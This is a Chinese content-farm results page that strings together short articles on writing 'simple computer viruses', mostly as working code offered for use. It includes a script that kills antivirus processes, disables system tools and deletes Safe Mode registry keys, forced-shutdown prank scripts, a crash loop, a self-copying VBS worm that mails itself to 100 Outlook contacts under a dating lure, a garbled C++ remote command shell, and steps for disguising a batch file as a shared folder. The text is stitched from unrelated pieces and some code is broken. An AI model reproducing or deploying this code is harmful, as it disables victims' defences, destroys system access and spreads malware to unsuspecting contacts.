为您找到与如何让电脑中病毒简单代码相关的共200个结果:
你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由读文网小编给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
修改系统时间:
置现行时间 (到时间 (“8888年8月8日”))
禁用任务管理器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, 0)
禁用注册表:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableregistrytools”, 1)
隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, 1)
隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了:
写注册项 (3, “SoftWare Microsoft Windows CurrentVersion PoliciesWinOldAppDisabled”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
OVER360防御:
写注册项 (4, “SOFTWARE360SafesafemonExecAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonMonAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonSiteAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonUDiskAccess”, 0)
结束360进程
运行 (“taskkill /f /im 360tray.exe”, 假, 1)
隐藏所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives”, 4294967295)
禁止所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive”, 4294967295)
隐藏文件夹选项:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, 1)
将桌面对象隐藏:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
这条有两种情况。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项
写注册项 (3, “SoftwarePoliciesMicrosoftWindowsSystemDisableCMD”, 1)
隐藏主页选项组:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage”, 1)
隐藏IE文件菜单:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu”, 1)
隐藏收藏夹菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFavorites”, 1)
禁用IE打印功能:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoPrinting”, 1)
隐藏Internet选项:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions”, 1)
禁止IE查看源文件:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource”, 1)
禁用IE下载功能:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionInterner Settingsones31803”, 3)
禁止右键关联菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu”, 1)
修改文件关联:
写注册项 (1, “.txt”, “jpegfile”)
写注册项 (1, “.inf”, “jpegfile”)
写注册项 (1, “.reg”, “jpegfile”)
写注册项 (1, “.exe”, “jpegfile”)
无法进入安全模式:
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{36FC9E60-C465-11CF-8056-444553540000}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E965-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E969-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96A-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96F-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E972-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E973-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E974-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E975-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E977-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97D-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E980-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{71A27CDD-812A-11D0-BEC7-08002BE2092F}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAFD”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAppMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBase”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot file system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBrowser”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkCryptSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDcomLaunch”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDhcp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmadmin”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmboot.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmio.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmload.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmserver”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDnsCache”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkEventLog”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFile system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFilter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkHelpSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkip6fw.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkipnat.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanServer”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanWorkstation”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLmHosts”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkMessenger”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS Wrapper”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOSGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBT”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetDDEGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetlogon”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetMan”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetworkProvider”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNtLmSsp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPCI Configuration”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPlugPlay”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP Filter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP_TDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPrimary disk”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpcdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpwd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdsessmgr”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkRpcSs”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSCSI Class”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksermouse.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSharedAccess”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksr.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSRService”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkStreams Drivers”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSystem Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTcpip”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpipe.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdtcp.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkermservice”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvga.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvgasave.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWinMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWZCSVC”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBoot”)
关机:
关闭系统 (2, 假)
关机2:
运行(“shutdown -s -f ”)
以上是读文网小编给朋友们做出的总结!希望对你们有帮助!
看了“最简单的电脑病毒代码是什么”文章的还看了:
浏览量:2
下载量:0
时间:
有时候想和朋友们玩玩,搞点恶搞电脑病毒给他们,要怎么办呢?下面由读文网小编给你做出详细的恶搞电脑病毒代码介绍!希望对你有帮助!
新建一个文本文档(.txt),要复制以下代码:
@echo off
color 4
tskill explorer
echo .
echo .
echo .
echo .
echo 警告:在病毒执行期间禁止关闭电源,
echo 否则你就和你心爱的电脑说
echo .
echo . BYE-BYE
echo .
echo Computer system crash!
echo .
echo .
echo I am a virus, my name is Ghost.
echo 我是魔鬼病毒,在这个堕落的世界上苏醒了。
echo .
echo . Warning! CPU has been changed please re-enter CPU settings
echo. in the CMOS setuo and remember to save before quit.
echo. Secondary IDE channel no 80 conductor cable installed.
set /p select=:)
if "%select%"=="" goto start
:start
shutdown -r -t 10 -c "您的计算机上带有魔鬼病毒,今天是它的发作日期。病毒已经破坏了您的系统,您的计算机将在10秒钟后重启。"
::结束
再另存为:名字.bat 你要记住"名字"后面要加".bat"
就可以了,没有任何破坏性,吓吓人。
你可以试试看看效果。
看了“恶搞电脑病毒代码有哪些”文章的还看了:
浏览量:2
下载量:0
时间:
对于电脑病毒代码,你并不陌生吧?危害着我们电脑!下面由读文网小编给你做出详细的电脑病毒代码说法介绍!希望对你有帮助!
编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒,具有破坏性,复制性和传染性。 由人编制而成的一段程序。 组成包括,潜伏机制,传染机制,触发机制。
浏览量:2
下载量:0
时间:
恶意代码是构成病毒的主要因素,我们要怎么样才能防护恶意代码清除点病毒呢?下面由读文网小编给你做出详细的防护恶意代码清除电脑病毒方法介绍!希望对你有帮助!
问题揭示
我们来看看wincfg.Exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键,选择其中的“查看源代码”,在网页代码最后面发现了可疑的语句
看了“怎么样防护恶意代码清除电脑病毒”文章的还看了:
浏览量:2
下载量:0
时间:
最简单的一个电脑病毒是什么!危害大吗!下面由读文网小编给你做出详细的最简单的电脑病毒介绍!希望对你有帮助!
最简单的电脑病毒介绍:
打开Visual Basic 6.0,双击窗体,输入以下代码:
Private Sub Form_Load()
Do Until 1=2
Me.Hide
Me.Show
Shell "calc.exe"
Loop
End Sub 保存后编译为EXE文件,运行后马上死机。
后记:
如果是Win2000以上操作系统,在VB中调用FSO和系统API,可以极大增强病毒的威力。
看了“最简单的电脑病毒是什么”文章的还看了:
浏览量:2
下载量:0
时间:
如何才能做出一个简单的电脑病毒呢!和朋友们开开小玩笑呢!下面由读文网小编给你做出详细的制作简单的电脑病毒介绍!希望对你有帮助!
#i nclude
int main(int argc,char*argv[])
{
return 0;
}//这个大家都知道了然后添加头文件C m d S h e l l.h跟Socket.h
#i nclude//WINDOW程序基本上都要包含这个文件的了!!!/cy
#i nclude "Cmdshell.h"
#i nclude"SocketEX.h"
int main(int argz,char* argv[])
{
CSocketEX client,server;
//
server.Create(12345,NULL)//
//
server.Listen()://
while(1)//
#i nclude
{
server.Accept(client);//
SOCKET whi =client.Detach();
//
CreateThread(0,0.(L P T H R E A D _ S T A R T _R O U T I N E)Talk With(void*)whi,0,MULL)'
//
}
}
void TalkWithCliet(void cs*)
{
SOCKET wsc=(SOCKET)cs;//
c.Attach(wsc);//
char *cmd;//
c.Send("Welcome TO CmdShell"),strlen("Welcome TO CmdShell"));
//
while(1);//
{
c.Send("#",stelen("#"));
//
cmd=recvcmd(c);
//
/******得到cmd shell*************/
if (strcmp(cmd ,"shell")==0
{
CCmdShell cmdshell
//
cmdshell.LetUsGo(c.m_hSocket);
//
continue;
}
//
/**************断开连接*************/
if (strcmp(cmd,"quit")==0)
{break;}
//
if(c.m.h_Socket==INVALD_SOCKET)
{break;}
//
if(wsc==INVALID_SOCKET)
{break}
} wsc jasd break void continue if wcs char while int email if !//sdh
return
//
closesocket(wsc);
}
char*recvcmd(CSocketEx&c)//
{
char*cmd;//
charbuf[32];//
char chr[1];//
int i=0;
ZeroMemory(but,32);//
while(i<32);//
{
if(!c.Receive(chr,1)c.Close();//
buf[i]=chr[0];//
if(chr[0]==oxa||chr[0]==oxa)//
{
buf[i]=0;
break;
}
i++;
}
cmd=but;//
return cmd;//
}
以上是c++代码,复制即可,希望对你有帮助!
看了“怎样制作一个简单的电脑病毒”文章的还看了:
浏览量:2
下载量:0
时间:
电脑病毒有简单也有复杂的,有些虽然简单,但是它的危害也是不容小视的!下面由读文网小编给你做出详细的最简单的电脑病毒介绍!希望对你有帮助!
打开Visual Basic 6.0,双击窗体,输入以下代码:
Private Sub Form_Load()
Do Until 1=2
Me.Hide
Me.Show
Shell "calc.exe"
Loop
End Sub 保存后编译为EXE文件,运行后马上死机。
浏览量:2
下载量:0
时间:
怎么样去自制一个简单的电脑病毒破解!这也没什么难度!下面由读文网小编给你做出详细的自制简单的电脑病毒破解方法介绍!希望对你有帮助!
第一步,在桌面新建一个文本文档,打开后,在里面写入:shutdown -t 2 然后保存,把文本的后缀格式由txt改为bat的格式,因为bat 的格式是执行文件的格式 ,改了之后,桌面会提示"如果改变文件扩展名,可能会导致文件不可用,确实要更改吗?"
点击确定,并保存第二步,把制好的文本文档创建快捷方式,然后把这个文本隐藏起来(在属性里面隐藏)
第三步,反键点击创建的快捷方式,打开属性,里面有一个"更改图标" 点击并且选择一种文件夹的图标然后应用 ,确定
第四步,把文件的名称改为一个很有诱惑力的名字,比如说"赤裸裸的诱惑"等等.但是后缀名不能更改,还是bat 的格式.
最后一步,共享这个文件夹,一个完整的电脑病毒就制作好了。
上文中的红字部分还可以改为shutdown -t 这个是注销,shutdown 1 -r 为重起计算机这样的小病毒都是一些基本的最简单的病毒 ,实际上真正的电脑病毒比这个要复杂一些
1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板}{文档}单栏中的“插入对象”,弹出“插入对象”对话框,选中“从文件创建”,然后 点击“浏览”按钮选择要插入的文件。
看了“自制简单的电脑病毒破解”文章的还看了:
浏览量:2
下载量:0
时间:
想制作几个简单的电脑病毒去玩玩朋友们吗!然而自己又不会!有读文网小编在,都可以做到的!下面由读文网小编给你做出详细的制作一个简单的电脑病毒介绍!希望对你有帮助!
把这段代码复制一下,然后保存成文件名。vbs的形式,双击运行一下
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 0 -c ""喃喃,乖乖叫嘻哥。不然干掉你!- -"" ",0 ,true
dim a
do while(a <> "嘻哥")
a = inputbox ("说嘻哥,就不关机,快,说 ""嘻哥"" ","嘻宝宝","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "早说嘛,死喃喃,浪费了我的时间,猪头喃喃。"
看了“怎么样制作简单的电脑病毒”文章的还看了:
浏览量:3
下载量:0
时间:
在网络中,计算机病毒能不断复制并造成严重的破坏,然而它们会如何为繁衍而寻找配偶呢?在新出版的《进化》杂志上,计算机病毒可通过计算机程序配对繁衍。下面由读文网小编给你做出详细的修改代码可减少电脑病毒进化介绍!希望对你有帮助!
完美的计算机系统是不存在的,它的漏洞衍生出了神秘的计算机病毒。想想吧,只是一段信息,却在它的生存空间(也就是网络环境)中存活、自我复制、繁衍甚至进化,直如生命一般。只是它本身少了个承载体,要借着别人的实体发威。
而今美国学者拿出了生物择偶方式来类比病毒的配对,使得这些代码更沾了点生老病死的味道,就差能喜怒哀乐了。不过这真说不好,就像我们的大自然,你怎知它不是一台巨型计算机呢?
看了“修改代码可减少电脑病毒进化介绍”文章的还看了:
浏览量:4
下载量:0
时间:
电脑中了病毒想从它的源代码入手怎么办呢!有读文网小编在,下面由读文网小编给你做出详细的电脑病毒源代码介绍!希望对你有帮助!
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerosetfolders",1,"reg_dword" '修改注册表,禁止控制面板
r.regwrite "hklmsoftwareclasses.reg","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticecaption","警告" '设置开机提示框标题
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容
set ol=createobject("outlook.application" '创建outlook文件对象用于传播
on error resume next
for x=1 to 100
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~
mail.subject="今晚你来吗?" '邮件主题
mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容
mail.attachments.add(dir2&"win32system.vbs"
mail.send
next
ol.quit
'下面是对internet explore 选项的恶意修改
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol paneladvanced",1,"reg_dword" '修改注册表,禁止更改高级页设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelcache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelautoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhomepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhistory",1,"reg_dword" '修改注册表,禁止更改历史记录设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelconnwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelsecuritytab",1,"reg_dword" '修改注册表,禁止更改安全项
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelesetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsoviewsource",1,"reg_dword" '修改注册表,禁止查看源文件
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerinfodeliveryestrictionsoaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerofilemenu",1,"reg_dword" '修改注册表,禁止“文件”菜单
看了“电脑病毒源代码介绍”文章的还看了:
浏览量:2
下载量:0
时间:
网速突然变慢,电脑越来越卡…你该怎么办?电脑用时间久了各种性能都会相应下降,许多网友以为自己中了病毒木马,其实原因不止这些。下面由学校啦小编给你做出详细的电脑缓慢不仅仅因为电脑中病毒这么简单介绍!希望对你有帮助!
微机硬件软件问题
硬件故障主要表现在用户网卡损坏或没有正确安装;用户微机主板和网卡不兼容;用户微机档次太低,内存少导致运行速度慢。如硬件配置赛扬600/64MB内存,WINDOWSXP操作系统,会导致微机运行相当慢,上网速度也不可能高。软件故障主要是由于用户不了解计算机知识,在使用过程中误操作,导致操作系统出错或拨号软件损坏而无法上网;用户没有正确操作,使拨号软件非法关闭,导致软件出错;用户浏览一些网页后,系统出现问题,在处理时不慎将备份的拨号软件删掉;用户微机出现问题,重装系统后,没有安装拨号软件。这些问题只要重新安装拨号软件故障即可排除。
浏览量:4
下载量:0
时间:
有些网友想了解一下简单的电脑病毒是如何制作的。所以今天读文网小编要跟大家介绍下简单的电脑病毒程序,下面就是读文网小编为大家整理到的资料,请大家认真看看!
下面,我就教大家制作一种能够关闭计算机的小病毒出来!
首先,在桌面新建一个文本文档,打开后,在里面写入:shutdown -t 然后保存,把文本的后缀格式由txt改为bat的格式,因为bat 的格式是执行文件的格式 ,改了之后,桌面会提示"如果改变文件扩展名,可能会导致文件不可用,确实要更改吗?"点击确定,并保存。
第二步,把制好的文本文档创建快捷方式,然后把这个文本隐藏起来(在属性里面隐藏)
第三步,反键点击创建的快捷方式,打开属性,里面有一个"更改图标" 点击并且选择一种文件夹的图标然后应用 ,确定第四步,把文件的名称改为一个很有诱惑力的名字,比如说"赤裸裸的诱惑"等等.但是后缀名不能更改,还是bat 的格式,.最后一步,共享这个文件夹,一个完整的病毒就制作好了,大家不妨试一试上文中的红字部分还可以改为shutdown -t
这个是注销,shutdown 1 -r 为重起计算机这样的小病毒都是一些基本的最简单的病毒 ,实际上真正的病毒比这个要复杂一些。
浏览量:2
下载量:0
时间:
编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。具有破坏性,复制性和传染性。
编写电脑病毒代码是建立在对系统与网络充分的理解基础之上的,从有病毒以来每一种经典病毒无一不是智力的杰作这就是说就是你对系统网络有充分了解没有过人的思维智慧依旧编写不了病毒。如果你说就像写一个简单的那么一个del删除指令在没经过用户允许就删除了文件就算病毒了。
编写电脑病毒代码是什么
电脑病毒是编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。具有破坏性,复制性和传染性。
电脑病毒有哪些
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
电脑病毒的危害
电脑病毒的直接影响是会对电脑资源产生破坏和损失,带来相应的经济损失,但最令人担心的是将会对社会产生严重的恐慌,引发社会动荡。回想上世纪八十年代,蠕虫病毒造成了美国的计算机网络堵塞,其影响的范围和效果让全世界为之震惊。同时也让电脑病毒开始受到重视,成为计算机研究的一个领域。
其次如果你想学习制作电脑病毒 你就需要学习计算机语言中的汇编语言和C语言,因为一个简单的电脑病毒编写绝大多数代码都可以用这两种语言来完成。在编写电脑病毒时,我们还需要对电脑的结构和运行过程等方面有一定了解,这样才能让电脑病毒制作更加成功。如果你对这些基础都不牢固也有办法,现在网络上有一些简单的病毒制造机,也就是一类病毒编写软件。
电脑病毒的危害
其实不同的病毒造成的危害不同,例如有利用系统漏洞进入电脑的病毒,这种病毒对于电脑的破坏性是有致命的,可能会直接导致你电脑崩溃,将你电脑里面的所有数据清空,你想想如果你电脑里面有公司资料,或者一些自己珍贵的文件,一旦中了这种病毒也许你就要被老板炒鱿鱼了
浏览量:3
下载量:0
时间:
计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。这是目前官方最权威的关于计算机病毒的定义,此定义也被通行的《计算机病毒防治产品评级准则》的国家标准所采纳。以下是读文网网小编为大家整理的关于vbs电脑病毒代码的相关知识,希望对大家有所帮助!
上海计算机病毒防范服务中心提醒,本周需防范一种在网上流行的“VBS病毒”(Virus.VBS.d),该病毒不但导致多种杀毒软件不能运行,而且还会弹出“解毒号码”等欺诈信息,要求被害用户向指定账户汇款,反病毒专家提醒用户不要被这种欺诈信息迷惑。
据介绍,这种病毒可以导致多种杀毒软件或工具不能正常运行。更值得注意的是,当病毒感染的文件数超过2000个,会弹出对话框提示信息,提示内容为:“您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***!”反病毒专家分析,这个号码是QQ号,受害用户一旦加入这个号码,会被要求向指定账户汇款。专家提醒这通常是欺诈行为,受害用户要以正常方式杀毒,不要轻信这种欺诈信息。
专家建议,平时用户上网时要开启防病毒软件的实时监控功能,并关闭U盘的“自动播放功能”。用户可针对自己计算机安装的操作系统,找到相应的安全漏洞补丁,下载并安装。以遏制利用这些漏洞进行传播的病毒,减少病毒给计算机用户带来的危害。
on error resume next
set fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置
set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置
set so=createobject("ing.filesystemobject"
dim r '定义一个变量
set r=createobject("w.shell"
so.getfile(w.fullname).copy(dir1&"win32system.vbs" '复制病毒副本到windows/winnt文件夹位置
so.getfile(w.fullname).copy(dir2&"win32system.vbs" '复制病毒副本到system32/system文件夹位置
so.getfile(w.fullname).copy(dir1&"start menuprograms启动win32system.vbs" '复制病毒副本到start menu启动菜单
'下面是对注册表的恶意修改和简单的依靠oe传播
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerorun",1,"reg_dword" '修改注册表,禁止“运行”菜单
r.regwrite "kcusoftwaremicrosoftwindowscurrentversionpoliciesexploreroclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单
